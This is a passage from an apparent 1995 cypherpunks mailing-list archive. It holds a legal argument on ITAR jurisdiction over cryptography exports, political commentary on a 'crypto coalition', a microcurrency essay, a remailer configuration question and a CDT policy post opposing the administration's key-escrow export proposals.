cryptographic device that was not made in the United States or by a United States company to another foreign person who has never been in the United States. And now assume that F does come to the United States on a holiday and that he is arrested and indicted for violating the AECA in that he did transfer a cryptographic device to a foreign person. The first thing to notice is that the indictment is not defective.
The only defense--since it is the only one that we are interested in and we control the hypothetical--is: ``but that was in a foreign country'' and therefore the United States has no jurisdiction under international law (or under something) to treat F's actions as a crime. So the defense moves to dismiss the indictment on those grounds. And the prosecution stipulates that the acts charged occurred in a foreign country, that F is a foreign person, etc. On those facts I would hope that the court would construe the statute as not covering F's actions outside the United States and would dismiss the indictment, but--considering that the statute specifically says it applies both within the United States and ``abroad''--I am not nearly as sanguine as Mr. Froomkin is. But let us assume that the indictment is dismissed. And now the hypothetical provision in the ACEA is again amended by congress to make it a crime ``for (i) a United States citizen to transfer a cryptographic device to a foreign person within the United States or abroad or (ii) a foreign person to transfer a cryptographic device to a foreign person within the United States or abroad, without in either case first obtaining a license or a waiver of jurisdiction from the Office of Defense Trade Controls.'' And now assume that F', who has never been in the United States transfers a cryptographic device to a foreign person and thereafter comes to the United States and is arrested and indicted for violating the hypothetical provision of the ACEA. It would seem to me that there is no way that any but the most willfully wrong-headed court (and there are, I admit, such courts) would construe the hypothetical provision as not covering F's actions, since it does so clearly cover those actions. I mean that there is no way that the court can get away with concluding that it does not mean what it says. So what can F' do now? Well, he could try to raise the claim that the lack of ``jurisdiction''--which is the justification for Mr.
Froomkin's ``any court'' construing the ITAR's actual provisions would not apply to F or F'--is a ground for dismissing the indictment. But how can he raise that point? He can't very well deny that the court has jurisdiction over his person--he's sitting in the court with shackles on--and he can't get away with claiming that the court doesn't have jurisdiction to try him for violating the ACEA. So it would seem that F's only hope would be to move to dismiss the indictment on the ground that to continue the prosecution would be to deny him due process because the United States lacks jurisdiction under international law. Now I am no expert in this area, but I would be surprised if the courts would recognize this as a constitutional defense. As I understand it from talking with somebody here at CWRU who is knowledgeable, the courts of the United States tend to defer in such cases to Congress and the executive--when they are in agreement, as they would be in our hypothetical--and principles of international law count for little. So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of the crime of delivering a cryptographic device to a foreign person outside of the United States. Now let's get back to the ITAR as it is actually written. In an actual criminal action brought against a foreign person who is accused of disclosing cryptographic information to a foreigner outside the United States--not that I think such an action will ever actually be brought--the government can point out to the court the facts that I have just discussed, so the court will be aware that there is no constitutional provision requiring the dismissal of the indictment, even if the indictment is contrary to international law. And a real court, as opposed to Mr. Froomkin's ``any court'' might in those circumstances feel free to determine that the ITAR means what it says. (That's just common sense.)
And, were the government ever to bring such a case, it would argue, and I think that it would convince a lot of real judges, that the criminal action does not violate international law because the United States is protecting its own economic interests by prosecuting foreign persons who disclose cryptographic information to other foreign persons outside the United States. The government's lawyer will argue: Judge, the United States is in a real bind. It is absolutely necessary for our national security that we forbid the export of cryptographic software. But, on the other hand, as those Cryptopunks keep pointing out, we are destroying our computer industry by enforcing the ITAR against American companies. So the only solution is to apply the ITAR against foreigners as well so that the American computer industry will have a levelled--I mean a level--field to play upon. And the anti-trust cases make it absolutely clear that the United States does have jurisdiction to enforce its laws against foreign criminals who break those laws outside of the United States when their crimes have a negative effect upon the economy of the United States. I am afraid that most federal district court judges would buy that argument, and I am not even sure that Mr. Froomkin's ``any court'' wouldn't buy it. And, in any case, if such a criminal case were to be brought, the government would almost certainly be able to allege additional facts to help justify the claim that the US does have jurisdiction over the matter under international law. For example, the defendant might be French, and the French government might be cheering the United States government on. If the crime is a crime under both French law and the law of the United States then there is going to be no problem with the United States asserting jurisdiction. (That is, if I understand it correctly, Mr. Froomkin's murder example.)
Or the defendant may have studied cryptography in the United States, before he returned home and disclosed the information. Or the information that he disclosed had previously been unlawfully exported from the United States in violation of the ITAR (PGP, for example). Or the foreign person is an employee of a United States company or a foreign company doing business in the United States. Or even that the disclosure was done by a message transmitted over the Internet that happened to be routed through the United States. But the matter is even more simple than that since the government is not going to bring those criminal charges against a foreign person or a United States person or anyone else if they can possibly avoid it. The ITAR's provisions on cryptographic software are used by the government to spread fear, uncertainty, and doubt, and to discourage the spread of strong cryptography. Since an actual criminal case would almost certainly result in at least significant parts of those provisions being held unconstitutional, the government is not going to bring such a case if it can find any other ways of satisfying its goal. And looked at that way, our foreign person who discloses cryptographic software to one or more other foreign persons abroad is going to be the perfect fall guy. As I have suggested before, the government will simply bar him from getting a visa to enter the United States since violation of United States foreign trade regulations is a ground for denying a visa--at least an immigrant's visa. And, despite Mr. Froomkin's claim that our foreign person would have a cause of action if his ``petition'' were denied, he would probably have no recourse whatsoever. Certainly he would have no claim that the United States has no jurisdiction to exclude him for acts done by him outside the United States; the United States has jurisdiction to exclude foreigners for things that the foreigners did outside the United States, like believing in polygamy.
And a foreign person outside the United States may not have standing to complain of violations of his freedom of speech outside the United States in an American court. But let us assume, contra-factually that Mr. Froomkin is right, and that the poor, excluded foreign person would have a good cause of action to force the government to give him a visa. (Though I really am curious as to what that action would be.) That cause of action is going to cost tens of thousands of dollars to pursue, and it will take years before it is resolved in favour of our foreign person, who will be excluded--or sitting in jail with a bunch of Cuban and Chinese refugees--until the case is resolved in his failure. I am sorry to have written such a long message, and to have been so slow in writing it, but I think that part of the problem is that both Mr. Froomkin and I were shooting from the hip, and that is why our disagreement grew. But perhaps it has all been worthwhile, for I do think that there are a few useful conclusions that can be drawn from this discussion: (i) We academic lawyers tend to try to settle real world questions as if they were academic questions; (ii) It is never safe to assume that any court will construe a statute or a regulation as meaning something other than what it says; (iii) One can only construe a legal text in a particular context; even if one thinks that one can figure out how any court would interpret the text in question, one still needs to know how the text got before the court; and (iv) The fact that you can always sue the police for unconstitutional harassment isn't of much help when they reach for the rubber hose. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From vznuri at netcom.com Thu Nov 9 16:03:09 1995 From: vznuri at netcom.com (Vladimir Z.
Nuri) Date: Fri, 10 Nov 1995 08:03:09 +0800 Subject: Gingrich, "crypto coalition" & dysfunctional philosophy In-Reply-To: <199511091637.RAA06491@utopia.hacktic.nl> Message-ID: <199511092308.PAA18692@netcom14.netcom.com> From: nobody at REPLAY.COM (Anonymous) >The gov't may well lose this fight eventually, but a few heads are gonna >get broken before either side wins. This fight is playing itself out on >the level of policy now, but it's much bigger than a policy issue. And the >"revolution" of Newt and his legions of weenies (I say nothing of Clinton >and his legions of weenies) is bullshit: he's an empty opportunist who's >riding a fractious coalition that'll make Clinton look like a libertarian >if it ever gets control of the country. And right now he's cluing in to >the fact that he can score some points on encryption issues: he's got his >eye on the snowballing WiReD coalition, which *no one* knew existed until >a few years ago. a short comment on Gingrich: I think he is one of the few politicians with balls enough to make tough choices such as budget cutting. of course people detest someone like him. he has horrible approval ratings in the single digits. people would rather have politicians lie to them that no tough choices are necessary in the future, or that if any are, all the grandmothers in the country will be conveniently exempted. I don't see Gingrich at all as an opportunist in the sense of Clinton, i.e. someone who has no intrinsic moral compass that governs his decisions and positions on issues. to the contrary Gingrich has definite convictions on various issues. he is willing to compromise on them frequently to get a consensus, however. but my main point in writing was that I thought I would highlight this phrase given to us by A.Nonymous: the "crypto coalition". or it might be called the "computer coalition". I think I see a few faint glimmerings of a new political movement, potentially.
the recent Washington Times editorial on the Exon pornography law, encryption, and the superiority of allowing people to develop tools to screen what they don't want to so, could be considered a portrayal of some of the key philosophies. it's very interesting to contemplate that the online crowd could become a more well-organized political coalition that has influence in politics. it's clear to me this is happening weakly and informally at the moment. (i.e. people on the internet having similar philosophies, hence voting with the same aims, although not organizing to do so yet). a key ingredient I see working against this: the "coalition" has a lot of libertarian sentiments, and libertarians tend to be anti-government and almost disdainful of even participating in politics. one might differentiate between cybernauts who are interested in reforming our government and using the Net as a tool to do so, such as Jim Warren, and people at the opposite end of the spectrum of "participation" such as TCM, who seem to advocate that political battles be simply rejected or ignored as irrelevant to the future of "cryptoanarchy". (although recent noises of his I quoted were distinctly uncharacteristic.) if anyone is going to have influence in politics, it would be the former type. but at least in the places in cyberspace where I hang out, I tend to see more of the latter type: extremist libertarians who almost seem to suggest that government is inherently unclean and dirty, no matter what form it takes. I think these are the types that would hate a government and advocate disenfranchisement with it no matter what direction it took, even if a libertarian was elected to a powerful office. (it's an interesting question to contemplate). it seems to me to be largely a philosophy of alienation bordering on nihilism. now, I have been trashed in public for this position before, but the philosophy of "us vs.
them" applied to government in my opinion is the wrong paradigm and only contributing to the problems, imho. an organized "cyberspace coalition" could have tremendous political power to the point that all the key annoying laws (such as the Itar etc.) actually become election issues brought into mainstream consciousness. the editorials I have seen about the Exon amendment etc. are steps in those directions. I've seen TCM argue on this list against this, such that we should just give up on telling congress what is important to us etc. it was a position that was not unanimous, and in fact quite controversial however, and remarkably PM once argued against it. (heh. love the fireworks on this list. they are quite unpredictable at times). I'm all for replacing a dysfunctional government. but people here seem to advocate that this happens automatically when one has certain technology. there is a whole other approach to "cryptoanarchy" that no one here has ever suggested, but which could be tremendously effective: "infiltrate" political positions with people sympathetic to that philosophy, and work to change the entire structure toward it. "infiltrate" is a scary word, but IMHO nothing any different than demopublicans appointing demopublicans to office would be going on. a very interesting, key quote by someone here went to the effect: "if TCM is right, nothing the government does matters. if TCM is wrong, nothing we do matters". a fascinating psychological justification for a sort of nihilism. but at the root of it is a kind of laziness and hostility to organization or groups in any form, IMHO. in fact the libertarian extremists here seem not only to hate government, they seem to hate the whole idea of groups accomplishing things, about the idea of groups coming to consensus. this is a quite remarkably cynical ideology. 
I'm going to make a prediction: I think the people who are interested in organizing the "cyberspace coalition" are starting to come together right now, and that over the long run, this entity will be far more beneficial in advancing a better reality through cyberspatial technology than all the people who advocate disillusion, antagonism, resentment, and nonparticipation in groups and government, to the point the latter approach will be generally discredited. in other words, we have a powerful system that can be changed from the inside instead of abandoning it. at the moment, I've not seen any proof that a dedicated group couldn't reform it from the inside, only a lot of cynical conventional wisdom that such a thing is inherently impossible and useless to try. the comment I quoted displays the conventional wisdom on this list, that the encryption issue is "us vs. them", "people vs. the government", etc. what would A.Nonymous say if someone who was elected began to embrace the position that encryption is a right? I'm sure he would find some new reason to be disillusioned with government. that's the position of radical libertarians. no matter what form government takes, no matter who is driving it, they hate it. the first lesson for radical libertarians bordering on anarchists that love this list is not that Oppressive Government is the problem, but that Government Is Always Bogus. a rather infantile philosophy that reminds me of the way children defy authority or structure merely because it is an authority or a structure, not because of any particular disagreements they have with the underlying philosophy it expresses. (or rather, they manufacture the disagreement with the philosophy as required, such that the reasoning is, if an authority stands for [x], then I am against [x], and against that authority). 
and this is precisely the dysfunctional philosophy to life I am referring to that I think will be discredited in the long run as intellectually vacuous and actually counterproductive to any kind of progress. from what I have seen of Gingrich, he might be a potential leader of this kind of "computer coalition". he is the congressman who has taken stands on encryption issues and other key cyberspace issues that seem to suggest an internal awareness of constitutional rights superseding momentarily-politically-fashionable government legislative whims. of course I'm putting on my flameproof longjohns as I say that.

From bdolan at use.usit.net Thu Nov 9 16:12:29 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Fri, 10 Nov 1995 08:12:29 +0800
Subject: Adm. William Studeman speaks about the CIA (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Wed, 08 Nov 95 17:24:55 CST
Subject: Adm. William Studeman speaks about the CIA

SAN ANTONIO -- Admiral William Studeman, Deputy Director, CIA spoke to the San Antonio World Affairs Council on Wednesday (8 Nov). He covered the organization of the Central Intelligence Agency; foreign intelligence; the future of intelligence; and went on to state:

"While the press is reporting a reduced need for intelligence.. President Clinton has signed an Executive Order increasing the level of intelligence collection to a level 4.. A level 4 for example are countries like Somalia, Haiti, and Yugoslavia.. so the collection needs are much greater than ever before."

"This administration now also requires that intelligence be turned over to law enforcement agencies; which was never done before."

[...]

From ddt at lsd.com Thu Nov 9 16:13:42 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Fri, 10 Nov 1995 08:13:42 +0800
Subject: European Online Development list
Message-ID:

[In case this interests any of you. -dave]

................................. cut here .................................
>Date: Wed, 8 Nov 1995 19:28:25 +0100
>From: steve at isys.hu (Steven Carlson)
>Subject: invitation to join the European Online Development list
>
>Greetings -
>
>I'm writing to invite you to join the European Online Development list
>. If you're active or interested in Internet in Europe or
>the CIS, this list may be for you.
>
>I'm inviting you because you're one of my circle of contacts, and work
>either in journalism or in an Internet-related field. I'm sending a
>similar letter out to several hundred people who attended Esther Dyson's
>East-West High-Tech Forum, held recently in Bled, Slovenia.
>
>A day before this year's conference opened, Esther held a special meeting
>of Internet providers and related companies from around Europe and the
>CIS. We all agreed it was a very useful meeting, that we should meet again
>soon, and that we should all try to keep in contact over the net.
>Therefore this list.
>
>As commercial Internet pioneers in Europe, we find ourselves in surprising
>agreement on a number of topics. Though many of us now earn our daily
>bread from providing Internet connectivity, many of us suspect the real
>future may be in content. Yet what form this new medium will take - or who
>will pay how much for what - still remains a mystery.
>
>We share concerns about privacy, copyright, encryption, censorship and
>libel. In each of our countries, these and other issues will eventually
>need to be addressed by new laws, laws that will be written by people who
>- we suspect - know very little about online realities.
>
>In each of our countries, the local PTT is waking up to the smell of
>profits in the IP market. These telecoms much prefer a comfortable
>monopoly to the vagaries of competition. The PTTs have considerable
>financial resources and political connections. How can smaller Internet
>providers compete with these giants on even terms? Who will guarantee a
>level playing field?
>
>I think you'll agree there's plenty to talk about.
>And at this early stage in the development of Internet that's exactly
>what we need to do.
>
>I hope this list becomes a useful resource: a place to learn what others
>are doing in Europe and the CIS; a place to identify potential partners; a
>place to watch and learn.
>
>To subscribe, send a message with no subject line, and the text: subscribe
>online-europe, to . Contact me if you need help
>.
>
>Once you subscribe, you might want to send a message to the list
>introducing yourself and your company. Give us some idea of what problems
>you're working with in the field of Internet media or connectivity. Or, if
>you like, share with us your success stories.
>
>Send your posts to
>
>A full WWW archive of online-europe is available at
>. Don't get too excited yet. At present
>all you'll find there are some test messages.
>
>Thanks for your attention, look forward to seeing you on the list.
>
>=steve=
>
>---
>Steven Carlson
>iSYS Hungary info at isys.hu
>steve at isys.hu http://www.isys.hu

From ghio at utopia.hacktic.nl Thu Nov 9 16:30:15 1995
From: ghio at utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 10 Nov 1995 08:30:15 +0800
Subject: encrypt-key remailers
In-Reply-To:
Message-ID: <199511080318.EAA29662@utopia.hacktic.nl>

Jennifer Mansfield-Jones (cardtris at umich.edu) wrote:
> ::
> Encrypt-Key: apasswd
> Request-Remailing-To: cardtris at umich.edu
> Subject: reply-block-test
>
> ** ...
>
> Trying the above, I find that it does *sort of* work as a reply
> block. If I append sample text and send everything to
> remailer at flame.alias.net, I get a reply back that looks like, for
> instance:
>
> Date: Mon, 6 Nov 1995 19:22:13 +0100
> From: Anonymous
> To: cardtris at umich.edu
> Subject: reply-block-test
>
> **
>
>
> The appended text, which I expected to come back conventionally
> encrypted with 'apasswd', has just vanished into the void.
> Obviously I'm missing something... probably something that seemed
> painfully obvious to the writer of the remailer help file.
> If I omit the encryption key and '**', I can get reply blocks to work fine,
> even chained through multiple remailers. Suggestions?

This is a configuration problem at the remailer, most likely a missing randseed.bin file.

From vznuri at netcom.com Thu Nov 9 16:33:41 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 10 Nov 1995 08:33:41 +0800
Subject: the revolution of microcurrency
Message-ID: <199511092347.PAA22507@netcom14.netcom.com>

the topic of "microcurrency" has come up on this list before and is reappearing with considerations being given to small charges for Web pages. I've been thinking about this a bit and thought I'd share some interesting ideas. (YMMV!!)

1st, there was a really excellent article on microcurrency in the Economist I believe that was really touting it as a revolutionary change in the economy. I agree with this wholeheartedly. the possibility that people can

- exchange extremely small amounts of cash without the cost of overhead
- and virtually instantaneously,
- over large geographical distances,
- potentially even seamlessly with regard to different currency exchanges,
- and a large infrastructure exists to distribute intellectual property for free,
- (possibly invisibly to governments)

will all contribute to a REVOLUTIONARY effect on culture. my key idea on all of this is that the whole idea of copyright is going to melt when you introduce cash, not be strengthened. there are a lot of people out there who think that one has to try to put a lock and chain on web pages or whatever that one is "selling", and the horrible problem of the net is that anything can be copied. and these people are feverishly working on specious "solutions" to this "problem" right now. WRONG!! this is precisely the view from the old ideology that says, "you have to protect what you are selling from other people or you won't make any money".
this theme will increasingly be discredited in the cyberspace world, which works inherently differently in a remarkable manner. I submit that things like the release of public domain standards and products like Java and Netscape for free are not merely blips at this moment but increasingly are going to be the marketing plan of the future. the idea is that you give away your product for FREE, and then people pay you if they like it. this new ideology will be relevant to products that are not "things" but in fact are more in the realm of intellectual property, i.e. writing, software, cyberspace web pages, etc. the beauty of this system is that NO LONGER is "unauthorized" distribution the "enemy". it is your FRIEND, a key aspect of profit!! the company that doesn't think in terms of this new ideology will try to control the distribution of their product. they will set up draconian systems that try to restrict the flow of the product to "authorized users". (i.e. those who pay in advance). our entire society thinks within this paradigm, including the government, which makes noises about ways to restrict copying on the internet by introduction of actual physical safeguards. NOPE!! a rather extraordinary new economy can replace this, that of voluntary payment. widespread distribution becomes your FRIEND. you DISDAIN things like copyright, because they prevent your "product" from reaching the eyes of potential customers. your goal is actually to distribute the product as far as possible, in a sort of pyramid-like scheme. you want your "customers" to distribute your product to their friends, so that those "friends" potentially become customers in an endless cycle. this approach works amazingly with writing. imagine that if John Markoff suddenly QUIT the NYT and just wrote articles on his own. and imagine that at the bottom, you see a message, "for more of the same, send .5c or more to markoff at liberated.com".
I submit that in the future, Markoff will probably be able to make more money than he does at NYT, because he is eliminating the middleman. the newspaper company is primarily built as a *distribution* channel. suddenly he doesn't have to pay anything out of his own salary, so to speak, for distribution. distribution is *free*. he doesn't require anyone else to do it for him. he puts his article in an appropriate place on the net and it circulates like a VIRUS if it is well received. the more people that see the article, the more people that pay him money. in an information system, individual objects have no value. what has value is the FLOW of quality information. if Markoff continues to flow with that good information, people will continue to pay for it. they will perceive that "by paying him, the quality information flow from him to me continues or increases". this same idea works with software. you don't see software as an end product. you see it as something that is evolving over time. and whenever you send money to a company for software, in this new system the idea is that "I like this software, and I want to see it grow. here is my contribution to that". another interesting area is that of patents, and I see this dissolving in the same way. a patent is like trying to put a lock on an idea. but gradually people will realize, only ideas that are implemented have any value. you can't profit and lock an idea at the same time. *dissemination* of ideas is what leads to profit, not locking them up. hence there will be an economic incentive to an inventor to give away his ideas for free, at first. in the old system, where one thinks of an idea as a "thing", this sounds preposterous. but in a new culture where ideas are seen as things that need to be cultivated and grown to work, it will seem eminently sensible. the inventor is releasing his idea to the world, saying "I can expand on this idea, even turn it into a reality, if you send me money".
other people can of course steal the idea, but there is no value in the idea itself: the value is in the development of it into evolved new states, or the intellectual expertise of the inventor. in short, microcurrency could have quite a liberating and revolutionary effect on economics as we know it. in the current system, people are not paid for tiny contributions to the whole. the contributions have to be "packaged up" into something like a magazine before individuals can get any profit. a new system may allow people to be compensated directly for things that are hard to quantify. how much was Markoff's last article worth in the NYT? that's impossible to figure out. but if you had a microcurrency, you can calculate exactly how much money people sent to Markoff for his last article. say, across the world, it totalled $843.16. such a sum is not inconceivable. and over time it would be enough for him to make a salary over the whole year on, perhaps!! I'm arguing that this is increasingly going to become VIABLE over the next few years with cyberspace and microcurrency. the beauty of this system is that this increased granularity filters down to individual pieces such as a single piece of writing, a single software program, single contributions by individual people that can be rewarded tangibly. that's all that currency is, in its most basic form: a system whereby members of a society say to each other, "please continue to do that for me, do more of it, and do it even better-- because I value it *this* much!!" there is a lot of ink in the press lately about the Netscape/Java assault on the Microsoft bastion. I think there is something more important conceptually going on at a lower level. Microsoft has never released a product for free to the world. they are still in the old paradigm, "you have to control something to prosper". they are at this minute coming out with a PROPRIETARY (read: "you have to lock something to profit from it") alternative to Java. 
Netscape understands the contrary philosophy BEAUTIFULLY. you write the software, and DISTRIBUTE IT FOR FREE. same with Java: you create OPEN STANDARDS. these companies don't fully understand what direction they are going in (notice how they are only committing to the idea of free software or standards "from the start", but not afterwards), but I think they are the precursors to a radically transformed economic system based on cyberspace microcurrency. the microcurrency situation can even be set up in a company. "whoever codes this computer problem will receive [x] dollars from the company". the whole economic system becomes a fluid, pulsing entity that filters down to the tiniest fraction of value and gives each individual a quantitative value on his contribution. companies talk about "incentive systems" today, but perhaps the entire economy will become an enormous incentive system in this way in the future!! in this system, ultimately, I think the whole concept that someone "buys a product" will dissolve into the idea that "one rewards intellectual productivity to bring more of the same". it's as fundamental and intuitive as the difference between atoms and bits.

From editor at cdt.org Thu Nov 9 16:48:18 1995
From: editor at cdt.org (editor at cdt.org)
Date: Fri, 10 Nov 1995 08:48:18 +0800
Subject: CDT Policy Post No. 29 - Coalition Says New Crypto Policy Flawed
Message-ID:

Pardon the massive mailing (I have never posted a full Policy Post to this list before), but I thought a majority of you would find this interesting and relevant.
Jonah (editor at cdt.org)

------------------------------------------------------------------------
POLICY POST   November 9, 1995   Number 29
CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 29 November 9, 1995

CONTENTS:
(1) Public Interest/Industry Coalition Says Administration Crypto Policy Flawed -- Pledges to Develop Alternative
(2) Text of CDT-led coalition letter to Vice President Gore
(3) How To Subscribe To The CDT Policy Post Distribution List
(4) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its entirety. Excerpts may be re-posted by permission (editor at cdt.org)
-------------------------------------------------------------------------

(1) Public Interest/Industry Coalition Says Administration Crypto Policy Flawed -- Pledges to Develop Alternative

A broad coalition of nearly forty public-interest organizations, trade associations, and representatives from the telecommunications and computer hardware and software industries sent the attached letter to Vice President Albert Gore on Wednesday, objecting to the Administration's recently announced cryptography policy.

While the letter praised the administration for its efforts to develop a national cryptography policy, the signatories, which include groups such as EFF and companies such as America Online, Apple, AT&T, MCI, Lotus, Microsoft, and Tandem Computer (organized by CDT), expressed concern that the Administration's proposal is weighed heavily in favor of law enforcement and national security while neglecting the privacy and security needs of individuals and the marketplace.
The letter states:

"A secure, private, and trusted Global Information Infrastructure (GII) is essential to promote economic growth and meet the needs of the Information Age society. Competitive businesses need cryptography to protect proprietary information as it flows across increasingly vulnerable global networks. Individuals require privacy protection in order to build the confidence necessary to use the GII for personal and financial transactions... The undersigned groups recognize that the Administration's recently articulated cryptography initiative was a serious attempt to meet some of these challenges, but the proposed initiative is no substitute for a comprehensive national cryptography policy. To the extent that the current policy becomes a substitute for a more comprehensive policy, the initiative actually risks hindering the development of a secure and trusted GII."

The coalition pledged to work together to formulate recommendations for an alternative cryptography policy based on the following principles:

* ROBUST SECURITY: access to levels of encryption sufficient to address domestic and international security threats, especially as advances in computing power make currently deployed cryptography systems less secure.
* INTERNATIONAL INTEROPERABILITY: the ability to securely interact worldwide.
* VOLUNTARY USE: freedom for users to choose encryption solutions, developed in the marketplace, that meet their particular needs.
* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to meet the expressed needs of cryptography users.
* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth Amendment privacy protection and regulation of searches, seizures, and interceptions.
* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national security, while recognizing the reality that determined criminals will have access to virtually unbreakable encryption.
A second group, composed of conservative/libertarian organizations including Americans for Tax Reform and Citizens for A Sound Economy, issued a similar letter on Wednesday to House Speaker Newt Gingrich. The text of that letter, as well as additional information on the cryptography policy debate, can be found on CDT's Cryptography Issues Page:

URL:http://www.cdt.org/crypto.html

The letters come as the National Institute of Standards & Technology (NIST) this week announced revisions to the Administration's proposed export criteria announced last September (See CDT Policy Post No. 24). The revised proposal is substantively similar to the previous version, and maintains controversial provisions including:

* LIMITS ON KEY LENGTH: The revised proposal would continue to only allow the export of cryptography systems with 64 bit key lengths, but only if the keys are escrowed by an agent approved by the U.S. Government and if the systems meet the other export criteria.
* RESTRICTED INTEROPERABILITY: While the revised proposal does clarify the interoperability provision, it would continue to prohibit exportable products from operating with any other cryptographic products that do not meet the NIST criteria.
* NO PRIVACY SAFEGUARDS: The proposal contains no mention of the procedures for law enforcement access to escrowed keys, the standards for certifying escrow agents, or the obligations on escrow agents to protect privacy.

CDT believes that the NIST proposals fall far short of the promise for a more sensible and comprehensive cryptography policy outlined last July in Vice President Gore's letter to Rep. Maria Cantwell. The current proposal fails to provide adequate security, protect the privacy of individuals, and meet the needs of the global marketplace.
CDT believes that a more comprehensive approach to cryptography policy is necessary to address both the immediate need for strong cryptographic applications and the long-term development of a secure and trusted Global Information Infrastructure. CDT will work with the signatories of the letter over the next six months to develop an alternative to the Administration's proposal.

-----------------------------------------------------------------------

(2) Text of CDT-led Coalition Letter to Vice President Gore

November 8, 1995

The Honorable Albert Gore, Jr.
Office of the Vice President
Old Executive Office Building, Room 276
Washington, D.C. 20501

Dear Mr. Vice President:

A secure, private, and trusted Global Information Infrastructure (GII) is essential to promote economic growth and meet the needs of the Information Age society. Competitive businesses need cryptography to protect proprietary information as it flows across increasingly vulnerable global networks. Individuals require privacy protection in order to build the confidence necessary to use the GII for personal and financial transactions. Promoting the development of the GII and meeting the needs of the Information Age will require strong, flexible, widely-available cryptography. The undersigned groups recognize that the Administration's recently articulated cryptography initiative was a serious attempt to meet some of these challenges, but the proposed initiative is no substitute for a comprehensive national cryptography policy. To the extent that the current policy becomes a substitute for a more comprehensive policy, the initiative actually risks hindering the development of a secure and trusted GII.

A number of the undersigned organizations have already written to express concern about the latest Administration cryptography initiative.
As some of us have noted, the Administration's proposed export criteria will not allow users to choose the encryption systems that best suit their security requirements. Government ceilings on key lengths will not provide an adequate level of security for many applications, particularly as advances in computing render current cryptography systems less secure. Competitive international users are steadily adopting stronger foreign encryption in their products and will be unlikely to embrace U.S. restrictions. As they stand, current export restrictions place U.S. hardware manufacturers, software developers, and computer users at a competitive disadvantage, seriously hinder international interoperability, and threaten the strategically important U.S. communications and computer hardware and software industries. Moreover, the Administration policy does not spell out any of the privacy safeguards essential to protect individual liberties and to build the necessary public trust in the GII. The current policy directive also does not address the need for immediate liberalization of current export restrictions. Such liberalization is vital to enable U.S. companies to export state-of-the-art software products during the potentially lengthy process of developing and adopting a comprehensive national cryptography policy. Without relief, industry and individuals alike are faced with an unworkable limit on the level of security available and remain hamstrung by restrictions that will not be viable in the domestic and international marketplace. Many members of the undersigned groups have been working actively with the Administration on a variety of particular applications, products, and programs promoting information security. All of us are united, however, by the concern that the current network and information services environment is not as secure as it should be, and that the current policy direction will delay the secure, private, and trusted environment that is sought. 
Despite the difficulties of balancing the competing interests involved, the undersigned companies, trade associations, and privacy organizations are commencing a process of collective fact-finding and policy deliberation, aimed at building consensus around a more comprehensive cryptography policy framework that meets the following criteria:

* ROBUST SECURITY: access to levels of encryption sufficient to address domestic and international security threats, especially as advances in computing power make currently deployed cryptography systems less secure.
* INTERNATIONAL INTEROPERABILITY: the ability to securely interact worldwide.
* VOLUNTARY USE: freedom for users to choose encryption solutions, developed in the marketplace, that meet their particular needs.
* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to meet the expressed needs of cryptography users.
* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth Amendment privacy protection and regulation of searches, seizures, and interceptions.
* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national security, while recognizing the reality that determined criminals will have access to virtually unbreakable encryption.

In six months, we plan to present our initial report to the Administration, the Congress, and the public in the hopes that it will form the basis for a more comprehensive, long-term approach to cryptography on the GII. We look forward to working with the Administration on this matter.

Sincerely,

American Electronics Association
America Online, Inc.
Apple Computer, Inc.
AT&T
Business Software Alliance
Center for Democracy & Technology
Center for National Security Studies
Commercial Internet eXchange Association
CompuServe, Inc.
Computer & Communications Industry Association
Computing Technology Industry Association
Crest Industries, Inc.
Dun & Bradstreet
Eastman Kodak Company
Electronic Frontier Foundation
Electronic Messaging Association
EliaShim Microcomputers, Inc.
Formation, Inc.
Institute for Electrical and Electronic Engineers - United States Activities
Information Industry Association
Information Technology Industry Council
Information Technology Association of America
Lotus Development Corporation
MCI
Microsoft Corporation
Novell, Inc.
OKIDATA Corporation
Oracle Corporation
Securities Industry Association
Software Industry Council
Software Publishers Association
Software Security, Inc.
Summa Four, Inc.
Sybase, Inc.
Tandem Computers, Inc.
Telecommunications Industry Association
ViON Corporation

---------------------------------------------------------------------------

(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the regular news publication of the Center For Democracy and Technology. CDT Policy Posts are designed to keep you informed on developments in public policy issues affecting civil liberties online.

SUBSCRIPTION INFORMATION

1. SUBSCRIBING TO THE LIST

To subscribe to the policy post distribution list, send mail to "Majordomo at cdt.org" with:

subscribe policy-posts

in the body of the message (leave the subject line blank)

2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list, you can send mail to "Majordomo at cdt.org" with the following command in the body of your email message:

unsubscribe policy-posts youremail at local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------

(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC.
The Center's mission is to develop and advocate public policies that advance constitutional civil liberties and democratic values in new computer and communications technologies.

Contacting us:

General information: info at cdt.org
World Wide Web: URL:http://www.cdt.org
FTP URL:ftp://ftp.cdt.org/pub/cdt/
Snail Mail: The Center for Democracy and Technology
1001 G Street NW * Suite 500 East * Washington, DC 20001
(v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 29 11/9/95
-----------------------------------------------------------------------

From mark at lochard.com.au Thu Nov 9 17:31:53 1995
From: mark at lochard.com.au (Mark)
Date: Fri, 10 Nov 1995 09:31:53 +0800
